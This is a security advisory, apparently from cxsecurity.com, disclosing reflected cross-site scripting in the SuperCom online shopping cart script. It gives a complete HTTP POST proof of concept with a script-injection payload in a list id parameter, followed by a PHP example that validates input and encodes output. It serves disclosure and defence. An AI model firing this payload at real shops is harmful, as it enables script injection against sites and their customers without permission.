SuperCom - Online Shopping Ecommerce Cart - Cross-Site Scripting

2018.08.29
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: SuperCom - Online Shopping Ecommerce Cart - Cross-Site Scripting
# Google Dork: N/A
# Date: 2018-08-17
# Exploit Author: Ali Alipour
# Website: Alipour.it
# Vendor Homepage: https://codecanyon.net/item/supercom-online-shopping-ecommerce-cart/17085987
# Software Link Download: http://dl.20script.ir/script/shop/supercom[www.20script.ir].zip
# Version: N/A
# Tested on: Kali Linux / Windows 10

# Proof of Concept:

POST /shopp/api-main.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1:80//shopp/
Content-Length: 64
Cookie: PHPSESSID=hg088mdvtd99gn8sh1kkika962
Connection: keep-alive

cid=1&lstid=9'%22()%26%25<acx><ScRiPt%20>prompt('Ali Alipour')</ScRiPt>

Parameter: stid (POST)
Payload: stid=9'%22()%26%25<acx><ScRiPt%20>prompt('Ali Alipour')</ScRiPt>
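The PoC shows a list id parameter whose value is reflected into the response unencoded, so the quote, angle-bracket and ampersand characters in the payload survive into the page. The fix on the server side is the usual pair: reject input that is not a valid id, and HTML-encode anything that is echoed. The following is an added example written for this advisory, not SuperCom's own code; it assumes the parameter is named `lstid` as in the request body (the advisory's Parameter line says `stid`) and uses a simplified HTML response instead of whatever `api-main.php` actually returns.

```php
<?php
// Added example (not SuperCom's code): hardened handling of the list id
// parameter that the advisory shows being reflected by /shopp/api-main.php.
// Parameter name 'lstid' and the response shape are assumptions.

declare(strict_types=1);

/**
 * Validate a list id: only a positive integer is acceptable.
 * Returns null for anything else, so the raw input is never reused.
 */
function validateListId($raw): ?int
{
    if (!is_string($raw)) {
        return null;
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

/**
 * Encode a string before it is placed into an HTML document.
 * ENT_QUOTES | ENT_HTML5 neutralises ', ", <, > and &, which are exactly
 * the characters the PoC payload relies on.
 */
function htmlEncode(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

/**
 * Handle a POST body (as $_POST would present it) and return the status
 * code and HTML body to send. Kept free of side effects so it is easy to test.
 */
function handleRequest(array $post): array
{
    $id = validateListId($post['lstid'] ?? null);
    if ($id === null) {
        // Do not echo the offending value back; a fixed message is enough.
        return ['status' => 400, 'body' => '<p>Invalid list id.</p>'];
    }
    // Even a validated integer is encoded on output, as a second layer.
    return ['status' => 200, 'body' => '<p>Showing list ' . htmlEncode((string) $id) . '</p>'];
}

// Demonstration with the advisory's payload (URL-decoded) and a benign value.
if (PHP_SAPI === 'cli') {
    $payloadFromAdvisory = "9'\"()&%<acx><ScRiPt >prompt('Ali Alipour')</ScRiPt>";

    $rejected = handleRequest(['lstid' => $payloadFromAdvisory]);
    echo $rejected['status'], ' ', $rejected['body'], PHP_EOL;

    $accepted = handleRequest(['lstid' => '9']);
    echo $accepted['status'], ' ', $accepted['body'], PHP_EOL;

    // If free text ever has to be reflected, output encoding alone turns the
    // markup into inert text; compare this line with the raw payload above.
    echo htmlEncode($payloadFromAdvisory), PHP_EOL;
}
```

Validation is the primary control here because an id has no legitimate reason to contain markup; the output encoding is kept anyway so that a later change to the handler (reflecting a name or a search string, say) does not silently reopen the issue.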


Copyright 2024, cxsecurity.com